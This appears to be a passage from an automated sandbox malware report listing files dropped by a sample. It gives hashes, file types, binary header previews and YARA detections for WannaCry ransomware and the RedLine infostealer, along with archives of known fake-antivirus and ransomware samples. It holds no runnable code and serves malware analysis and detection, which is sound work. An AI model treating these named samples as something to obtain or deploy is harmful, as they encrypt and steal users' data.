                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L.....7M.................`!..................p!...@..........................0D.................. ..........................L.>.......$.......................................................>..............................................................`!......|..................@................p!.....................@................@$......"..............@................P$......$..............@................`$..v...&..............@.................$.....................@...
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):448512
                                                                                                                                                Entropy (8bit):7.686352303150041
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:hBGrTx2fgEViq+JoQ9tpecSXFADhKXPEKJRlETLV+PwoVUqwhlKq6yem8lhg:6rLEyptwnX+gXrRlESwKKhlP6yxGh
                                                                                                                                                MD5:03BAEBA6B4224371CCA7FA6F95AE61C0
                                                                                                                                                SHA1:8731202D2F954421A37B5C9E01D971131BD515F1
                                                                                                                                                SHA-256:61A9E3278B6BCC29A2A0405B06FB2A3BBCB1751C3DD564A8F94CC89EA957EC35
                                                                                                                                                SHA-512:386643B0A52B6B1A53E81A8500D040B6415E532EBAFFD1BE8D1AFD4CCB10F6C0342CF734B688EC803B960339284C8D9669E638B1648D9CC734CF7367659C7FD0
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>.5G..........................................@.........................................................................a.......Y ...e..............................................................................D............................rsrc...ru.......v..................@..@.data................z...................text...Y........................... ..`.rdata..*2.......4..................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed, RAR self-extracting archive
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):789363
                                                                                                                                                Entropy (8bit):7.995564811336945
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:ePPNsFNARXFh0Gy9Gtgt09HlncQXZlFeI5D7Cj+o:RNkltHXXZlFeiHab
                                                                                                                                                MD5:8CD7C19B6DC76C116CDB84E369FD5D9A
                                                                                                                                                SHA1:5E3ECD3E4EF8ADC294DB1E3525CDBDE46B2B7DDC
                                                                                                                                                SHA-256:47769A82AC9994BF50FDB7FF521D2364775AFEA3DA02D55450448A25E6F94645
                                                                                                                                                SHA-512:909D0A2EC4AF33C374D7453926E5999BADD2F9FA79D0648A7308F63911F673AE34EC275917999199E9FB3A669AF5C4AA460E7639C5E346F261DECD28B520039A
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L......@..................... ...P..p....`........@..........................0................... ..........................<)..........<...........................................................................................................UPX0.....P..............................UPX1.........`......................@....rsrc.... ..........................@..............................................................................................................1.20.UPX!....
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):199168
                                                                                                                                                Entropy (8bit):7.816608369359199
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:slkfrcHVaq65Oe/ALwm19MYDzMLGquSOt+nSmgevSvoWAnvN0bfINcfln8rvK:Wkfrc0q47/UwQFSFnH9SArvakSflnCS
                                                                                                                                                MD5:8803D517AC24B157431D8A462302B400
                                                                                                                                                SHA1:B56AFCAD22E8CDA4D0E2A98808B8E8C5A1059D4E
                                                                                                                                                SHA-256:418395EFD269BC6534E02C92CB2C568631ADA6E54BC55ADE4E4A5986605FF786
                                                                                                                                                SHA-512:38FDFE0BC873E546B05A8680335526EEC61CCC8CF3F37C60EEE0BC83EC54570077F1DC1DA26142488930EABCC21CB7A33C1B545A194CBFB4C87E430C4B2BFB50
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......eU!.!4O.!4O.!4O.!4O. 4O.Rich!4O.................PE..L...{.............................................@.......................... ..........................................................\............................................................................................................text............................... ....rsrc...\........................... ...........IS&.u..n.y...P0..c{. ..J..b.>..o.i...R...3.Ap..3...~.EW_.Y.}+..A.2.h.(N^.....B....e....l.h.}.R....?.....y..(.3....Gp.u..n.....P.j...2.R2.(.7.....5...m).&.G..RvZS....?$. t.z...e|3.-..........pRj...c.....]b.7T*..D..R.s...lS.\.i..0..yL?.....E{......ex..+.\.l..........AS..`_I8.....A..]c.r...h....Z......Z[../.f.}.p...[.6.t...IAx`....K.K@v}.#.x.../R.......@!:A.;E39.J......'1....3.)BE..........TER*b....O........U.rS_<..........E.....@....0v.....|.we.....@].
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3514368
                                                                                                                                                Entropy (8bit):7.995470941164686
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB
                                                                                                                                                MD5:84C82835A5D21BBCF75A61706D8AB549
                                                                                                                                                SHA1:5FF465AFAABCBF0150D1A3AB2C2E74F3A4426467
                                                                                                                                                SHA-256:ED01EBFBC9EB5BBEA545AF4D01BF5F1071661840480439C6E5BABE8E080E41AA
                                                                                                                                                SHA-512:90723A50C20BA3643D625595FD6BE8DCF88D70FF7F4B4719A88F055D5B3149A4231018EA30D375171507A147E59F73478C0C27948590794554D031E7D54B7244
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, Author: Florian Roth (with the help of binar.ly)
                                                                                                                                                • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, Author: us-cert code analysis team
                                                                                                                                                • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, Author: ReversingLabs
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2511528
                                                                                                                                                Entropy (8bit):7.210453995706242
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:6kAG2QGTC5xvMdgpdb1KRHGepUu2cGbqPs9+q2HRPTnFVSLE:6kAjQGTCnvMmpYQqPNRPTnF4Y
                                                                                                                                                MD5:DBFBF254CFB84D991AC3860105D66FC6
                                                                                                                                                SHA1:893110D8C8451565CAA591DDFCCF92869F96C242
                                                                                                                                                SHA-256:68B0E1932F3B4439865BE848C2D592D5174DBDBAAB8F66104A0E5B28C928EE0C
                                                                                                                                                SHA-512:5E9CCDF52EBDB548C3FA22F22DD584E9A603CA1163A622DB5707DBCC5D01E4835879DCFD28CB1589CBB25AED00F352F7A0A0962B1F38B68FC7D6693375E7666D
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y..v*..v*..v*...*..v*...*..v*...*I.v*...*.v*...*..v*..w*/.v*...*..v*...*..v*...*..v*Rich..v*........PE..L.....V............................Lh............@..................................v....@..................................s..,....@.......................`......@...............................Xm..@...............@....e.......................text............................... ..`.rdata..z...........................@..@.data............0..................@....rsrc........@......................@..@.reloc..2....`......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):86016
                                                                                                                                                Entropy (8bit):7.7036277170460306
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:vpeW2JCTz5eDMn1Wi8N36flDRdHOjN0O02SHU00wCpEbE1PDai41lkgD:xH2JCTz5mmYoDRdHOB0O3d00wiEY134D
                                                                                                                                                MD5:9D15A3B314600B4C08682B0202700EE7
                                                                                                                                                SHA1:208E79CDB96328D5929248BB8A4DD622CF0684D1
                                                                                                                                                SHA-256:3AB3833E31E4083026421C641304369ACFD31B957B78AF81F3C6EF4968EF0E15
                                                                                                                                                SHA-512:9916397B782AAAFA68EB6A781EA9A0DB27F914035DD586142C818CCBD7E69036896767BEDBA97489D5100DE262A554CF14BCDF4A24EDDA2C5D37217B265398D3
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@..........................................$..{(.k..Q...M.D......S5I......3..:........I-..Ea.........:..l~.?~.?~.?.U.?Y.?...?..?p..?..?#..?..?...?e.?.g.?..?Rich~.?........PE..L..._l.H.....................@......0.............@.............................................................................T........=..........................................................................................................UPX0....................................UPX1................................@....rsrc....@.......@..................@..............................................................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):179477
                                                                                                                                                Entropy (8bit):7.998951302367822
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:3072:5oVnkybquxcF6U/aVHOBuv7j4/rIUUT4iI5mflT9xuUqywFdiZS3e:5oV5bZxIsV4l/kz4iFh98UqywKw3e
                                                                                                                                                MD5:6D8C9D01BA5C32AEDC734087CC3D0B1B
                                                                                                                                                SHA1:F7E58E5EDD203ABC2364922B11B6641D3EE9ADD5
                                                                                                                                                SHA-256:92E885D1763E4BA1ABC92BEE9B08CA7A2AE358BDA5FE98B31A8E217327982BF7
                                                                                                                                                SHA-512:090B972E7D854DEE8C1DC45EE3035247EB8AB641C337FF8DA6DC3DBB84FA447DEEE688F760D36FDFB93CCA50D4AB27B5AB3347F75C5E4207A06E0ADA0607E3F7
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK..........MF..D.U...H.......Endermanch@FakeAdwCleaner.exe.cM2.N....,[Uo.a...#.M.]9(..xG.+...;.0.oT....L....8,..#..SK...n."g.N..[....[........l...F..f RI.Y.;.....L>..ob......k=...Ps.m.`$.....]5Z.F.S......\.fC.k...cp..{.`...u....:.#j.!.d.m.FV.....@X....Q.^....s7..Ml..d~9.y..A...U..J.).I..t.m.M.kg.E)....Me..`..<D=.1P."= ..2q.X...{.........)pcx.$..ZU.....$..|......k.st.E.v..r..{8.d.%..V.!.n....<B.9......?n#Z.U.........Fs..O.^ {.G.R#.]..5..Z....H@64............:+9#5P..J9......D.N.F...j..J...M.bJ$...B.B..(.&7...E....g]sC.L{].-...Th+..f..7.zI....h..k...:?B.!........C.....{....?...35v..........8..f).apaP.....*:....'.....Y.6u.>.?...6........G.s.<....j......-..tv.....H1i.Z....`....`.N .f.c0.uc.../..M ._T..I..Q..6....X..'`3..N..EdU..^....|....EM5.q...Do.....~9.toC......".ZW-...?..&P.....0....f.n.L.ti.Y.....QB....[/..-.M.7......P.....Q.)..!..A...../..OS9.gp....-.:s.$.&sv-\....S....W/~...Y@q..ada.* k6...d*...x`e...\.q.&}./,....i.9.;.,.3...1..}.Url........M"
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):267776
                                                                                                                                                Entropy (8bit):7.535290233283343
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:vDKW1LgppLRHMY0TBfJvjcTp5XxG8pt+oSOpE22obq+NYgvPuCEbMBWJxLRiUgV:vDKW1Lgbdl0TBBvjc/M8n35nYgvKjdzi
                                                                                                                                                MD5:7D80230DF68CCBA871815D68F016C282
                                                                                                                                                SHA1:E10874C6108A26CEEDFC84F50881824462B5B6B6
                                                                                                                                                SHA-256:F4234A501EDCD30D3BC15C983692C9450383B73BDD310059405C5E3A43CC730B
                                                                                                                                                SHA-512:64D02B3E7ED82A64AAAC1F74C34D6B6E6FEAAC665CA9C08911B93EDDCEC66595687024EC576E74EA09A1193ACE3923969C75DE8733859835FEF45335CF265540
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\Desktop\Fantom.exe, Author: Joe Security
                                                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\Desktop\Fantom.exe, Author: ditekSHen
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~.................W....PE..L...t..P..........#..........z....../.............@..........................`.......;..........................................P....`..................................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc........`....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):203087
                                                                                                                                                Entropy (8bit):7.998965133479219
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:6144:gEXMZKhTuDA9rBNxIzdZgNbSEehM1Kq+i:gVKNuKdIzcNbxD1f+i
                                                                                                                                                MD5:3500896B86E96031CF27527CB2BBCE40
                                                                                                                                                SHA1:77AD023A9EA211FA01413ECD3033773698168A9C
                                                                                                                                                SHA-256:7B8E6AC4D63A4D8515200807FBD3A2BD46AC77DF64300E5F19508AF0D54D2BE6
                                                                                                                                                SHA-512:3AAEEB40471A639619A6022D8CFC308EE5898E7CE0646B36DD21C3946FEB3476B51ED8DFDF92E836D77C8E8F7214129C3283AD05C3D868E1027CB8CE8AA01884
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK........d..LZt.7............Fantom.exe"..[.m1...}.U.3.*..:\..]7..n[.=Z..m.E.......h$.\@.M....~...+..._@&=ds..z..tbV.k..f...!5E\..._a...A...r...r6I..v.-S.....I...._..?....b.Bg.....~..PK.z,.D..B...B..<.'.|....z.....J.`@.a..../^0h.9.s.41di.b...=..,....d.HplX.=.%.a.Y.J.nrS...Vk.;K.7_.lvCx1....I..."....k.....me......pT....P.f7....~...{v.u.4....3F....4.].$....2.4a..-`......&....$......;3. ..6......d.....lg.P.o..^.1.R7y%O.....x......:...T.(L...2.....}...E..#.. .0.G.Z.^.p..vN.m{.........P..!...a..u...8..:.....>.0.~...f..dz1L.0..Bu<.h..v...BQ{...W. .`....I.Y...s<s..X..3.N.8........^..q/}.+.\i.Y.....l".k..e....AS45k...Y.o...[.~......#..G.b..f.c..|.cKe"b#..;..O.#].H..H......~...Rc...j.....8..1k..u.)hB.*..S:...C.;.e.H......|.O...:..v+...B.W[....<^..1....l..8....n(.....R44.&v..0v_az.s$...%...`Fp...0^..5...xg...eSO.FJ..,..-.........7T).J...LV.xe.#.P..8%..P.8..2.......+8D.j.xMY\x>..Erc.ymj^c*...^.h....E.A..;.`....'.i..R.. .W5m..!...&4.K...O1.?.8
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1721302
                                                                                                                                                Entropy (8bit):7.999903232734228
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:49152:pe9rvkVDuuk8/JWXY/+XyxN7kHBRcuA7/:pedkVDuuk8/YIsy7AHE
                                                                                                                                                MD5:974918541AA75F380AA6CB4D8BD3C4BD
                                                                                                                                                SHA1:D0A6A3A301CF5330B00281EE8FF04ED9C3455FC7
                                                                                                                                                SHA-256:D703FC0DE3F07684528BC1931479815A4B9CD7B66FEDBB753CA21314A6A300D6
                                                                                                                                                SHA-512:DB829BBA3372A6E452D03D24E998EE91D28E3816C9D1A8D81330D450B24DC695E15D2612EC69729BEAFB28D95271BA55B6BE8B95DBE7F4B15F4F65BF5B5279B5
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK.........43L....C..........Endermanch@HappyAntivirus.exe.+...)hK..H.; N.:N...HU.2.....|........xbpeu....4...st.,O"...2...$.W..1V..a...>.\f.#p.\...$...<m..Z..:.a..z...Bp.b.B.P..pOZ%r.......J..&){.n..E....s.+C.X.._......c.fj..x+..p.X..U.:./!]}..t.b;..i.x6.bs....Z....@.0..k.v.&N.J.rlS....I.ig5.Ph.~......!O....y6..Kt....<..gR.V^.{...#.k|WTc..5.I.>..u.a.+..uo.!......b.o.%.<!f`:....^9U.5..e.&..aY..z.x../u..a.p..>`.jo,)..t3.)L..i..v....C:.....3..M.&Q0|H...}.b$..&....LP....n....q...\ez....}....B.=.>x(...q..kX.....=.;Sg.t..3.....be../k.w..<.q.i3..#\.:...i.j6..d.........,H.G5C%..W.E...Lm.|.....'...".{.7.z.X..m...m.2].Y.......8F...d..R..Il. .U..}.....P..!....1H:.,%=3.H..?..fD.K.....F.5.+T.c...g..N*1g...}1......,4.x..T...........K.3.....F.-..*..|.".[..Z:.%?....jy%....]..;o2zYY.p.1....>.8;......n.%|$.;px}..N.%...y.0.Z%.~.....f....@.3o|....nGE-..{2..@...$$..3[.....*.o.p.+....3.0[..../..v..(..%.@.......|...<X..........y_.f ......oKAN..F8..
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):34300
                                                                                                                                                Entropy (8bit):7.994524271759185
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:768:xaTvxO0nJFcoYFY5Hn8tuWRHkD+unrGRcd0zOF9MzKh8yK4ZJy9ELob8a:EtOoJFSzt5BiGGmObB04Z09cobl
                                                                                                                                                MD5:5569BFE4F06724DD750C2A4690B79BA0
                                                                                                                                                SHA1:05414C7D5DACF43370AB451D28D4AC27BDCABF22
                                                                                                                                                SHA-256:CFA4DAAB47E6EB546323D4C976261AEFBA3947B4CCE1A655DDE9D9D6D725B527
                                                                                                                                                SHA-512:775BD600625DC5D293CFEBB208D7DC9B506B08DD0DA22124A7A69FB435756C2A309CBD3D813FC78543FD9BAE7E9B286A5BD83A956859C05F5656DAA96FCC2165
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK..........UMs2..>....L......Endermanch@InfinityCrypt.exe..Z9.o.KV.o.xug.]....Q~PY.QUkUH..:.TZ...E.(Y.N..n......)..#m....@....l.8.k..\.W,V8w...qU....N.|V.NtQ*.#2.YoP..S;.}|)..N.1.'?.....0e.aI.M..R..Zr..=}9.T+.....@]...Y..)!..z..b{......k5.C..WCU...no... |E.g.y....k.T......\'.O...7":s..D.m.L0....[I...`7.FA^.*.;...s..Nu.)...*7.E..L...U!..N.p...PG.C/...g...,...k.O8._...=...W.....%.-;.....,4s..ma...<+.h.0.....9A......&.].c..C`.?fQ.....g..R...>.....wF..0..x..vBIF;..m.s.E...d.R._=..i^dVV..Tq`...w.b......i...5..G.....|:|..k..l.....*..<..L.]...AV...t^,>T.nLW8W...pP.U..}..K.J]j....pc.2..d'...6.t..~...s74.K0M{.......ninG.lf|S.y3.t_.."9...kjG)..(.P...s\.......x%;....-d;...S.Y,.......-.... .1.D.S.....Q.<..2.6,.t......2..F..!.a.V......-=...t..S./....~..K.<..]f.ND...........U.t>.8[{.?...F..f...AQM`.+....K.m_JN...n...d@...G...w..k.......EY..?0./<......!...m<.<..@.42.....).)+..+...[HM..-Z~.X<......U............0w#...r...&.}.../3.t|z.........rmq}G..P...o.
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2580873
                                                                                                                                                Entropy (8bit):7.999939102869259
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:49152:TYlQo7QjNMZJRM4KEInWDwuK9fhCvLtoLCd:COjN6M4nU9p2toud
                                                                                                                                                MD5:C5AFBB8DA79525BA74AA0FDC5BB5D17A
                                                                                                                                                SHA1:19A7BB8F31F40592C350555EB450924193AA5AEF
                                                                                                                                                SHA-256:5F3C2E1AD778441373CBFDC5D07884376175A9409E260E60EDD292A95F9BC4CA
                                                                                                                                                SHA-512:36CD962AE3C4C0BEC993A1C379130FFBD5EF475E234E4CCFEBD51F4E52FF6861BC3C1EE6AB20DF4E8A1B04F4BA7F2F9437C9BCFBAD9573CFFC74A4680DDEC589
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK..3...c...@.....`'..@b.$...Endermanch@InternetSecurityGuard.exe......AE...^...]|S-..O....A#.#...U....%.....!....X.4.m..Y.M.".A....u.l*5zq....z...Q]...n...c.Y.G..(..O.........S..gx.(,n.7.M....m..d.......iB..SF.00..s.67..'..e.Vi...?Fa..62..E}..(......g...............7....f........-M'..3.,.8....^.~.{....'!.7.y.....L..;i.fX..E.......u......Er+....-..BVU...3.2WED.._.....<o.S.E.1J....j*ud.;S>...C..f...p.).."B/xlx.Y.C..lM.."~./....0._.=s.R.5,._........k..PE&...7.>..c..J%l......I..H....NA..=}...P.9....xb.q..H?.....+.../G....G..0.5...H(Z u.roob..A.;.:9U...."z..........).v-..Dq.^..".Hk.w..F!.t....z.H.......C.].Q.r ..Z).aa..#.Z..Y.lE.6..a.M..V....F..(=T...g.`.......ae.h.....R%.Q..........t.&%.kF.7PK.I.Q..."'9.Qb..0..n.z....,y.Q.....!w3.2.......:P.......%........G.2^Mw&..U..iP..>.G..N.........W..S7.vQ.4.../.HG../..o9.$5".I...&h(.....qU..>....P.V..,.7..c..u..?../.7+4.]e.'...#a.II..lM.2.<...lm....~.....C'.D.Qur;y>..<V....~... .n.r9.P....+3h....w..nM....
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):26359
                                                                                                                                                Entropy (8bit):7.99208020012939
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:768:gGkaFGuW/1rmxspfsYEOgDGjvZIxvTAd7i6BoBTYpk1:xhQBoSgDGDZQ0dhyj1
                                                                                                                                                MD5:1AEA5AD85DF3B14E216CC0200C708673
                                                                                                                                                SHA1:E3EE16E93BA7C3D7286DC9EBBAF940F0BCB6CAD3
                                                                                                                                                SHA-256:8DFA496C93680ADC10E77C0946C7927D3E58D79900013C95DFCA3411D766BD16
                                                                                                                                                SHA-512:06FAA190350E4558C6D4F1F201DC0698587495897593AAEAC16F3EA3D8C1C7F81D65BEEA6BC7E730CA1DF9BDFDF3CD2BCC84BF50F64787E0B1DBD21492796F36
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK..3...c...8..../f..).......Endermanch@Krotten.exe......AE...Q....>,.....}./A......r.=..@Nz....RGCZ.....{..H*.8..i..N.."W.+...@.;E..f....".l.t.f..rj..M@...V.Z../.i^Z.D...JX...J.m.5$F.Q...J..x.rF.....H#,:..t'..7...JKQJ.=..u\..M,.d.(<....,).dJ...~.Sg.......2...>...&Q}b.IJ.%`?6.~f..*......c.....a.f3...q......l....G..1`U...\..........e.Aw.R}W-s8.(.^..|.L..6.Q..N.2'.~..g..o.vQ......q.okL.4|*.#>"..G.0fN...L..b.*...pB...T%.BP],.B.RsRCa.....v..O.y...7V.......]4..q.n..{...........w-.}.oWT.v..c@......{.$....M^wC...Z..*o.p.].z...-xKd...{....P.T4/....n...B.+.JNn.LB.Z.`9E9".#g...v.'%..H7.f...l.I]e<q..C.D..x.G....=...zG.S.Q.+....iRS:..F.....S.8.A. .tH...Z-..x..U).......k...<...;^1..6..}AK.#......HI..@.X4.h|9V.^aZ.#.....B..P.|...gk...n...\-.....3..:P....Y.....^.....j..Ty..|{.%=Xt.;..Md..A....B}.0.K.T.....(.t..N..o...aU.`...HC. .)....<%.=%.....`....9j.<.Z..3k.^_i....!..s.3'.UP....3.Kc.].=.......c..-..k#K[.....{;...Oj...#Y..(.+k...D.F,..R.Ly.@.t.m...C..
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1034690
                                                                                                                                                Entropy (8bit):7.9997993383764445
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:GZTNiabEMrMDc3Hf80xcwCz+cjMhnY7zMCSbkDOBa3aizyvlZ1jJnap:G1Ni8EMIcXdewOXMcMfa3p4z15ap
                                                                                                                                                MD5:7A5994FAB80A2ED6ADF59A93C7BC2D88
                                                                                                                                                SHA1:FE2DDCEFD45C378DFB19817DE118FCF151C59B1F
                                                                                                                                                SHA-256:6EBAD2EA4D537EB1CE11DD19D495FCA3E2B8B4E50140D9B241B71F5F1BC71804
                                                                                                                                                SHA-512:5BA499F12ED0A5DE31350530402327DC323AAE7D414EE972BD652265E5226ADEF71D94C0B52A3BF0EBE8F95081C3C27708758EF15DA58163492AFDB664E08AD2
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK.........c.N.4[.............Endermanch@LPS2019.exe..b.J ...M........k.L.*..(. ..S.x.*X0.....>...'k...o.t.C.2.........i....).s+..2.t/..f.e...)...&..E..Z..y..b.&...c.....v...>..d`{.....V...2.......T/.7....gi.L....5...B>.5.....!.8Q...KT.L..HB.......P?.....=...YH*T....*.~f...W..?.@).jR..'e/7F_.S.$c.O...F...#.e.Q...(.)...*.D&w..y......p......qh..|.F.6.O... R...O....l....ycc..4.y...+p(.s.......wq.VC....7. .I.A.-....U.-..@.a7k.j.......Q<.+..^.fij...#.3m/.......}...5..k$/&.]b?. ...E.......7.h.Q!)..D.VID:q..E.c....0.../....U.._..<=.Q..|.]wq^.......g.o...Y..\.[..e....o.N....;.?..?.......zR`.q6...g(.t ..9..(..;.L......... j~0e...K.qr[O..."...43....8~t....i..*....q.+<...."q.......f...X$..m..<x.....y...%...V...A......d..}........8;s....x=U+....\..Y..|.t.x..#.CA..m..t.../8........q...VV*BW...M.:>F.,..RR......\|.....PTC.&....I....g_..go.F_:...x.E....N.%..=..%.T..A........2..h.........l>...\.A...).cT....f"[Y...0..7C.W..(......lN..!..~k.X%-...)..-.;.0.-..+.^{f0
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):384539
                                                                                                                                                Entropy (8bit):7.9994843619449485
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:6144:zk0gUeiDOm+YiE8ZtuKsFcxWSmycwbZFa3fPPG7ye3B95/HqXTVF5Ca0s4V:w0gUeKCZjsjSlXVF2e7y2rvqDPEaP4
                                                                                                                                                MD5:711743BFCFFBC075F3DF90412D33B1F4
                                                                                                                                                SHA1:5A8157AEA7D2B424F07673597BE661A44517E653
                                                                                                                                                SHA-256:0C5BB6B0098682F3CC63B95BD2F218D6186BD8F4E322B3A048107F20602AFB2B
                                                                                                                                                SHA-512:969E3699B5CCBF70C19C251E487B843160F8A24F284B85A6AC96E917114F0BF45EAC8F3BFF8837A66C4FDCBF6F71AE4E11E81317F7F89E03B5DC468CE2FEFFF2
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
